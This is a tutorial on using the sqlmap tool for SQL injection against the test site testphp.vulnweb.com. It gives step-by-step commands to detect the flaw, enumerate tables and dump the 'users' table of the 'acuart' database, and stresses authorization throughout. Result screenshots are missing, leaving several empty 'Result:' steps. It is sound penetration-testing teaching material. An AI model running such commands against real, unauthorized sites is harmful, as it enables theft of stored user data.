How To Perform SQL Injection Using Sqlmap Tool

In this increasingly advanced digital era, data protection has become crucial. However, cyber attacks are becoming more sophisticated and diverse, and one of them is SQL injection. This attack has become a serious threat to web applications and vulnerable databases. SQL injection is an attack that exploits vulnerabilities in the SQL query processing mechanism of a web application.

Through this security loophole, attackers can inject malicious SQL commands that are executed by the system, thus gaining unauthorized access to sensitive data, damaging or even deleting data, and even taking control of the infected system. In this article, we will perform SQL injection using the sqlmap tool, targeting a live web application specifically for penetration testing purposes. It's important to note that the author will not carry out any attacks on real live targets without proper authorization from the relevant parties, as that would be a violation, of course. Before we proceed, do you know what sqlmap tool is?

Sqlmap

The author will provide an explanation about the tool. So, SQLMap is a popular open-source tool used for web application penetration testing with the purpose of detecting and exploiting security vulnerabilities related to SQL injection. SQLMap is designed to assist security professionals and researchers in identifying SQL injection vulnerabilities in web applications and conducting automated penetration testing. SQL injection is an attack that exploits security vulnerabilities in web applications that use SQL queries to interact with databases. This attack allows an attacker to inject malicious SQL commands into user-provided inputs, enabling them to manipulate and retrieve data from the database, and even gain control over the entire system.

SQLMap works by identifying and exploiting SQL injection vulnerabilities in web applications. The tool employs a range of techniques and strategies to search for vulnerable parameters, test whether the web application can be exploited using specific SQL commands, and extract sensitive information from the connected database. SQLMap can be used through a powerful command-line interface, providing flexibility for users to customize their attacks. The tool supports various types of databases such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more. Additionally, SQLMap offers features like obtaining database structure, data exfiltration, executing shell commands, and much more.

However, it's important to note that SQLMap should only be used for legitimate purposes and with permission from the system owner being tested. Using SQLMap or similar tools without proper authorization can be considered illegal. Thus, SQLMap serves as an essential tool for security professionals and researchers to test and enhance the security of web applications by detecting and addressing potentially damaging SQL injection vulnerabilities.

Install

To install SQLMap, make sure you have already installed the Python programming language on your system, as SQLMap is written in Python. You can visit python.org to install Python. Here, the author is using the Windows operating system, but you can follow the same steps regardless. If you are installing it on Termux, ensure that you have installed Python and Git programming languages.

  1. First, you need to type the command below in your terminal:
    2. git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

  2. When it is installed, you will see something like this:
  3. The author will rename the sqlmap-dev to just sqlmap using the following windows command:
    4. ren sqlmap-dev sqlmap

  4. For Linux users, you can do it like this:
    5. mv sqlmap-dev sqlmap

  5. If the installation is completed, you can navigate to the directory where SQLMap was installed, like this:
    6. cd sqlmap

Usage

  1. To view the settings of SQLMap, you can follow this command:
    2. python sqlmap.py -h

  2. For the attack, we will target a live web application specifically designed for penetration testing, as mentioned earlier. The live web application is:
    3. http://testphp.vulnweb.com/product.php?pic=1

  3. We will detect whether the target is vulnerable to SQL injection attacks. To do so, we need to type the following command:
    4. python sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1

  4. You will see the results when the target is vulnerable to SQL injection attacks:
  5. The author will retrieve the target database tables using the following command:
    6. python sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --tables

  6. When successfully obtained:
  7. There are 8 tables in the "acuart" database and 79 tables in the "information_schema" database. The interesting part is that we will retrieve a specific column, database, and table that we target. How can we do that? Let's say the author wants to retrieve the "users" table from the "acuart" database and retrieve its column values. Here's how you can do it:
    8. python sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --column -D acuart -T users

  8. Result:
  9. Lastly, we will dump the data using the following command:
    10. python sqlmap.py -u http://testphp.vulnweb.com/product.php?pic=1 --dump -D acuart -T users

    Before that, you will receive an input prompt from SQLMap, similar to the usage of other tools and techniques like dictionary attack. You just need to enter "n" which means "no" to skip the data dumping process quickly.

  10. The result when the data dumping process is successful:
  11. Finished.

Closing

The methods described above by the author are just a few examples, as SQLMap offers many more capabilities that you can explore and practice on your own using the commands and settings mentioned earlier. With this article, you can gain an understanding of why attackers can quickly exploit database vulnerabilities, even without in depth knowledge of the target system. Hopefully, you find this information useful.